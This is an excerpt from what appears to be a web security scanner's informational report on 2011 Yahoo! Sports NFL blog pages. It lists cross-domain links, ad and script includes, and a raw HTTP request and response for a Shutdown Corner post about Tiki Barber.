-Colbert-found-his-way-back-onto-a?urn=nfl-wp6492&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Somehow, Keary Colbert found his way back onto an NFL roster">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-committed-to-non-committal-on-Qu?urn=nfl-wp6489&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="The Broncos are committed to non-committal on Quinn vs. Tebow">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-Brothers-it-isn-8217-t-about-the-?urn=nfl-wp6481&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="For the Ryan Brothers, it isn...t about the laughs right now">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
g/shutdown_corner/post/Shanahan-names-Rex-Grossman-Redskins-8217-Week?urn=nfl-wp6463&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Redskins name starting QB">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
down-Corner-Week-1-Preview-Podcast-Greg?urn=nfl-wp6458&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="The Shutdown Corner Week 1 Preview Podcast: Greg Cosell">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-s-employment-until-sev?urn=nfl-wp6446&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Colts delay Tressel...s employment until seventh week of regular season">
<img src="http://l.yimg.com/iu/api/res/1.2/tcsbrnHu2XoIp0S0.Ckzsw--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/08/12/tressel-pd.jpg" title="Colts delay Tressel...s employment until seventh week of regular season" alt="Colts delay Tressel...s employment until seventh week of regular season" width="94" height="63">
</a>
...[SNIP]...
it-looks-like-Manning-8217-s-str?urn=nfl-wp6439&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="More and more, it looks like Manning...s streak is in jeopardy">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
aneers-Hall-of-Famer-Lee-Roy-Selmo?urn=nfl-wp6433&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Tampa Bay Buccaneers Hall of Famer Lee Roy Selmon dies at 56">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
log/shutdown_corner/post/Aaron-Rodgers-8217-handlebar-mustache-gives-hi?urn=nfl-wp6423&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="QB's impressive 'stache">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
_corner/post/Former-Pats-safety-Brandon-Meriweather-leads-lis?urn=nfl-wp6406&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Prominent NFL players on the move">
<img src="http://l.yimg.com/iu/api/res/1.2/PXuMXOwJ2uaXo5fYsMtxbQ--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/04/cuts.jpg" title="Prominent NFL players on the move" alt="Prominent NFL players on the move" width="94" height="63">
</a>
...[SNIP]...
rudge-might-8216?urn=nfl-wp6399&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Troy Aikman still carries a grudge, might ...get physical... with Skip Bayless">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-mean-more-to-Packers-LB-Vic-So-?urn=nfl-wp6392&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Preseason could mean more to Packers LB Vic So...oto than most">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
wn_corner/post/The-Shutdown-Corner-Podcast-Mike-Silver?urn=nfl-wp6388&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="The Shutdown Corner Podcast: Mike Silver">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
back-8?urn=nfl-wp6382&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Haynesworth would ...give that money back... to have played for Pats instead of Redskins">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
orner/post/Colts-hire-Jim-Tressel-as-8216-gameday-consult?urn=nfl-wp6368&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Ousted Ohio State coach lands NFL job">
<img src="http://l.yimg.com/iu/api/res/1.2/h_zLXLqXGLxqtLROuGO0hQ--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/02/tressel.jpg" title="Ousted Ohio State coach lands NFL job" alt="Ousted Ohio State coach lands NFL job" width="94" height="63">
</a>
...[SNIP]...
corner/post/Video-Theismann-windily-calls-out-Redskins-retur?urn=nfl-wp6337&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="'Stupid' play infuriates announcer">
<img src="http://l.yimg.com/iu/api/res/1.2/CFHAgrHng88MCICCWPs.Ag--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/08/12/banks-pd.jpg" title="'Stupid' play infuriates announcer" alt="'Stupid' play infuriates announcer" width="94" height="63">
</a>
...[SNIP]...
-has-an-art-gallery-and-somebody-br?urn=nfl-wp6331&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Chris Cooley has an art gallery, and somebody broke into it">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
n_corner/post/A-week-before-the-season-Lance-Briggs-asks-to-b?urn=nfl-wp6329&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="NFL player's poorly timed request">
<img src="http://l.yimg.com/iu/api/res/1.2/4SGMPg8hKSC75E289QQ3XQ--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/02/briggs.jpg" title="NFL player's poorly timed request" alt="NFL player's poorly timed request" width="94" height="63">
</a>
...[SNIP]...
/shutdown_corner/post/Newton-causes-Bo-Jackson-to-wax-rhapsodic-gets-?urn=nfl-wp6323&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Bo Jackson praises rookie">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
g/shutdown_corner/post/Dez-Bryant-is-now-living-life-on-the-straight-an?urn=nfl-wp6320&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Dez Bryant's turnaround">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
ccaneerss-WR-Mike-Williams-guarantees-playoffs?urn=nfl-wp6314&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Buccaneerss WR Mike Williams guarantees playoffs">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
down_corner/post/The-Shutdown-Corner-Podcast-Rich-Eisen?urn=nfl-wp6310&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="The Shutdown Corner Podcast: Rich Eisen">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
yan-compares-Michele-Bachmann-to-Terrell-?urn=nfl-wp6302&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Jon Runyan compares Michele Bachmann to Terrell Owens">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
r/post/And-now-an-MRI-of-Braylon-Edwards-8217-hands?urn=nfl-wp6294&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="And now, an MRI of Braylon Edwards... hands">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
n_corner/post/Jerry-Jones-might-have-talked-himself-out-of-a-b?urn=nfl-wp6283&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="NFL owner's joke could be costly">
<img src="http://l.yimg.com/iu/api/res/1.2/znW.5ZhfWEz4FHFcKOfAlA--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/us/i/ww/news/2011/09/01/jones.jpg" title="NFL owner's joke could be costly" alt="NFL owner's joke could be costly" width="94" height="63">
</a>
...[SNIP]...
sville-guard-Edgar-Sosa-suffers-gruesome-?urn=ncaab-wp4622&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Ex-Louisville guard Edgar Sosa suffers gruesome broken leg">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
217-s-departure-extends-Wake-Fore?urn=ncaab-wp4618&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="J.T. Terrell...s departure extends Wake Forest...s run of bad luck">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
of-Vancouver-blames-NHL-for-riots-embarras?urn=nhl-wp11913&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="City of Vancouver blames NHL for riots, embarrasses itself">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-Wozniacki-lacks-many-things-fight-is-n?urn=ten-wp2976&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Caroline Wozniacki lacks many things, fight is not one of them">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
usted_racquet/post/U-S-Open-women-8217-s-quarterfinal-preview?urn=ten-wp2965&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="U.S. Open women...s quarterfinal preview">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
orner/post/32-keys-to-the-NFL-8217-s-2011-season-Part-II-?urn=nfl-wp6499&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="32 keys to the NFL...s 2011 season (Part II)">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
_corner/post/32-keys-to-the-NFL-8217-s-2011-season-Part-I-?urn=nfl-wp6496&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="32 keys to the NFL...s 2011 season (Part I)">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
ideo-Witness-Andrew-Ference-8217-s-Stanley-Cu?urn=nhl-wp11900&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Video: Witness Andrew Ference...s Stanley Cup flash mob">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
ers-GM-Holmgren-injured-in-8216-ser?urn=nhl-wp11901&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Report: Flyers GM Holmgren injured in ...serious... bike accident">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-s-new-helmets-are-even-m?urn=ncaaf-wp5948&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Somehow, Maryland...s new helmets are even more Maryland-y than we thought">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
oto-of-the-day-Jo-Wilfriend-Tsonga-eats-a-ten?urn=ten-wp2972&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Photo of the day: Jo-Wilfriend Tsonga eats a tennis ball">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
217-s-temper-costs-him-two-shots-a?urn=golf-wp5410&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Nick Watney...s temper costs him two shots as he cards 11 on par-5">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-Tsonga-on-court-during-argument-abo?urn=ten-wp2967&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Fish insults Tsonga on court during argument about player...s box">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
w-Keary-Colbert-found-his-way-back-onto-a?urn=nfl-wp6492&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Somehow, Keary Colbert found his way back onto an NFL roster">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
st/Breaking-news-American-golf-is-not-dead-after-a?urn=golf-wp5406&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Breaking news: American golf is not dead after all">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
The-Longest-Game-for-Cystic-Fibrosis-is-in-the-b?urn=nhl-wp11877&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="The Longest Game for Cystic Fibrosis is in the books">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
cos-are-committed-to-non-committal-on-Qu?urn=nfl-wp6489&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="The Broncos are committed to non-committal on Quinn vs. Tebow">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
/FedEx-Cupdate-Who-8217-s-headed-to-Chicago-for?urn=golf-wp5396&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="FedEx Cupdate: Who...s headed to Chicago for the BMW?">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
day-Boise-State-uncovers-Georgia-?urn=ncaaf-wp5937&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Mid-Major Monday: Boise State uncovers Georgia...s pressure points">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
he-Ryan-Brothers-it-isn-8217-t-about-the-?urn=nfl-wp6481&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="For the Ryan Brothers, it isn...t about the laughs right now">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-coach-takes-mystery-flatulence-as-sign-?urn=sow-wp4670&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Flamengo coach takes mystery flatulence as sign of disrespect">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
Daddy-NHL-Season-Preview-2011-12-Carolina-?urn=nhl-wp11870&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Puck Daddy NHL Season Preview 2011-12: Carolina Hurricanes">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
or-Day-Marvin-Miller-Joe-Niekro-Nola?urn=mlb-wp18621&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Happy Labor Day! Marvin Miller, Joe Niekro, Nolan Ryan talk shop">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
aling-ahem-look-inside-KHL-cheerlea?urn=nhl-wp11867&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Video: Revealing, ahem, look inside KHL cheerleader dressing room">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-that-Malbranque-retires-to-care-fo?urn=sow-wp4665&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Media reports that Malbranque retires to care for non-existent son">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
ey-8217-s-tough-guys-need-their-own-repr?urn=nhl-wp11832&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Do hockey...s tough guys need their own representative body?">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
nfl/blog/shutdown_corner/post/Shanahan-names-Rex-Grossman-Redskins-8217-Week?urn=nfl-wp6463&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Redskins name starting QB">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
eadlines-NHL-mental-health-debate-hockey?urn=nhl-wp11861&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Puck Headlines: NHL mental health debate; hockey wedding vid">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://add.my.yahoo.com/rss?url=http://sports.yahoo.com/nfl/blog/shutdown_corner/rss.xml"><img src="http://l.yimg.com/a/i/us/my/addtomyyahoo4.gif" alt="Add to My Yahoo!" width="91" height="17" border="0"></a>
<a href="http://sports.yahoo.com/nfl/blog/shutdown_corner/rss.xml"><img src="http://l.yimg.com/a/i/us/ext/rss4.gif" alt="RSS" width="17" height="17" border="0"></a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443" title="Tiki Barber remains unemployed and sad"><img src="http://l.yimg.com/a/p/sp/tools/med/2011/09/ipt/1315235529.jpg" class="thumb" /></a>
...[SNIP]...
o ear hole. Wilson's perspective is a little different from most players because of his peculiar path to the NFL. He spent two years in jail on a murder charge before winning acquittal in July 2009."><img src="http://l.yimg.com/iu/api/res/1.2/BPKGQ0jdhpW3wZ1h2.sLAg--/YXBwaWQ9eXZpZGVvO2NoPTExNDtjcj0xO2N3PTExNDtkeD05O2R5PTE7Zmk9dWxjcm9wO2g9NzU7cT03MDt3PTc1/http://d.yimg.com/a/p/sp/ap/ef/thumbe.762be49a500597e37c663af513f03336/ap-201109051652607617151.jpg" width="75" height="75"></a>
...[SNIP]...
109051622589677032:1" title="Washington Redskins quarterback Rex Grossman warms up before an NFL preseason football game against the Tampa Bay Buccaneers in Landover, Md., on Thursday, Sept. 1, 2011."><img src="http://l.yimg.com/iu/api/res/1.2/kvW5ryKw33IEylfO4yeWWw--/YXBwaWQ9eXZpZGVvO2NoPTg3O2NyPTE7Y3c9ODc7ZHg9MTtkeT0xO2ZpPXVsY3JvcDtoPTc1O3E9NzA7dz03NQ--/http://d.yimg.com/a/p/sp/ap/5c/thumbe.33d686071b58a0e7f7c893610da085d5/ap-201109051622589677032.jpg" width="75" height="75"></a>
...[SNIP]...
the Washington Redskins in Indianapolis. Manning is doubtful for Sunday's season opener against the Texans as he continues to recover from neck surgery, putting his streak of 227 starts in jeopardy."><img src="http://l.yimg.com/iu/api/res/1.2/7AmHvSwfughfnOWbICRuaQ--/YXBwaWQ9eXZpZGVvO2NoPTEwMjtjcj0xO2N3PTEwMjtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NzU7cT03MDt3PTc1/http://d.yimg.com/a/p/sp/ap/81/thumbe.69d59efaf75e1ded02d10de93c2dc147/ap-201109051559575906941.jpg" width="75" height="75"></a>
...[SNIP]...
<li><a href="http://www.footballoutsiders.com/" title="Football Outsiders">Football Outsiders <span>
...[SNIP]...
<li><a href="http://espn.go.com/blog/nflnation" title="Hashmarks">Hashmarks <span>
...[SNIP]...
<li><a href="http://kissmesuzy.blogspot.com/" title="Kissing Suzy Kolber">Kissing Suzy Kolber <span>
...[SNIP]...
<li><a href="http://beta.profootballtalk.com/category/rumor-mill/" title="Pro Football Talk">Pro Football Talk <span>
...[SNIP]...
<a href="http://us.lrd.yahoo.com/_ylt=Ar3rYXBPTB5YfC6vMuLwflDSrYZ4/SIG=123fvjdq3/EXP=1316522685/**http%3A//yahoosports.teamfanshop.com/NFL_Football" class="yspmore"><img src="http://l.yimg.com/a/p/sp/tools/med/2011/05/ipt/1305312565.jpg" alt="Shop for NFL Draft Gear!" title="Shop for NFL Draft Gear!"></a>
...[SNIP]...
<div id="n">
<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=728 HEIGHT=90 SRC="http://ad.yieldmanager.com/st?_PVID=FZWRgGKIPE7pARpjTl.wjQCLMhd7ak5mFb0ACDiN&ad_type=iframe&ad_size=728x90&site=140509&section_code=14445127&cb=1315313085685551&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15jh2o74n/M=787833.14445127.14291894.22/D=sports/S=2022092242:N/_ylt=Aq9E8pK_YqzvgGRT6l1fMpDSrYZ4/Y=YAHOO/EXP=1315320285/L=FZWRgGKIPE7pARpjTl.wjQCLMhd7ak5mFb0ACDiN/B=10yaQmKJiSo-/J=1315313085685551/K=TVKeZm0ugXKNYFYgkLGeew/A=6261245/R=0/*"></IFRAME>
...[SNIP]...
</noscript> <img src="http://ads.bluelithium.com/pixel?id=372007&t=2" width="1" height="1" /><script language=javascript>
...[SNIP]...
</div>

<script type="text/javascript" src="http://l.yimg.com/zz/combo?d/lib/yui/2.9.0/build/yahoo/yahoo-min.js&d/lib/yui/2.9.0/build/event/event-min.js&d/lib/yui/2.9.0/build/dom/dom-min.js&d/lib/yui/2.9.0/build/imageloader/imageloader-min.js&d/lib/yui/2.9.0/build/get/get-min.js&d/lib/yui/2.9.0/build/connection/connection-min.js&d/lib/yui/2.9.0/build/animation/animation-min.js&d/lib/yui/2.9.0/build/json/json-min.js&d/lib/yui/2.9.0/build/container/container-min.js&d/lib/yui/2.9.0/build/element/element-min.js&d/lib/yui/2.9.0/build/cookie/cookie-min.js&d/lib/media/phugc/mwphcom_min_r142.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/js/ult_bottom.r143221;js/teamtracker.r143221.js?m"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(1280131ab(gid$FZWRgGKIPE7pARpjTl.wjQCLMhd7ak5mFb0ACDiN,st$1315313085628168,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

15.99. http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sports.yahoo.com
Path:   /nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443 HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:41 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Set-Cookie: MwPhCom_degraded_status=false; path=/
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 6
Proxy-Connection: keep-alive
Via: HTTP/1.1 r1.ycpi.s1s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 291643

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Tiki Barber remains unemployed and sad - Shutdown Corner - NFL&nbsp;Blog - Yahoo! Spor
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Yahoo! Sports - National Football League News" href="/nfl/rss.xml">

<link rel="stylesheet" type="text/css" media="screen" href="http://l.yimg.com/j/assets/eJx1j-FuhCAQhJ9IBQ8R0ochFPZ6JMqaXWzj21fFJueP_loyfLszE5i7bU1d39pWdAQMpXliLtx8UYrckhxHo_VH2DlOBX5SBJf9t3uBj0DuiViAdsxIpcaKLUiFq2QepxRwnjF3n55h14dxGC4UPIWX88yJSzennOrT9UJYYXoh9cMcG1rL_v3SxkszY_ybp5m25j8kBcy3jBezTH4DynuFs6ky4pY3Jg4T8kpnaiWNff8NnnBlmI5NbW3Ndzjxzap6uFr1Cqp-ARhQf5A,.css?z&m" />
<link rel="stylesheet" type="text/css" media="screen" href="http://l.yimg.com/j/assets/eJxtUOlugzAMfqJ1hOYA7WGiNDEQLQeKQzvefiFUAqb9svSdtjXi5wAqLwmMfLg44i2RjjTN_UsXCn5mSHnD6L1tScWm6EE6UAZzTKt8u6uv6Xl_aHw0i9sJwsQeqKP3MZSxhGziKxRScCb25BI6LiBRT7A5L62DClnhegmlVJx8tRNn0Haw-qQTXcO7qntaA_GC5KT0N6RLmtJyKtc5G_7UoI4J8mTDVR7wBQnlQ5kRJLnRrUAIyirr1_M5x4Pef1hx_iib1nn8uiOEs_9kYXCF5qRn7S-GjZe9.css?z&m" />
<link rel="stylesheet" type="text/css" media="screen" href="http://l.yimg.com/j/assets/eJxVkGuOwyAMhE_UPIEQ9TCRQ5wWieIKk-329suj0qa_kPzNMGMb5vZ92HZo5qZrAzLGy04-8uUW7MZN6KdJK3U1SWfo8SDfrsCY5nKScirzf79JTrAeQ_HNw1j46ui24G_E4MEtd4StCtQo6gdsI77shouHnw9fdqJYZLoXH9nTwTsRRgjmXoiaRSE7QjwCbkuO4oK6bjyXzg-mtRIT4zD0ZxaJ3Ao5S8l-rDYI0RqHX_n589xbT2I--2svn_qWewn9Hb1ZNo449ctXE72uZiZj0znWI0by2Si1ErXXi6Ds12kt_wDHPo2P.css?z&m" />
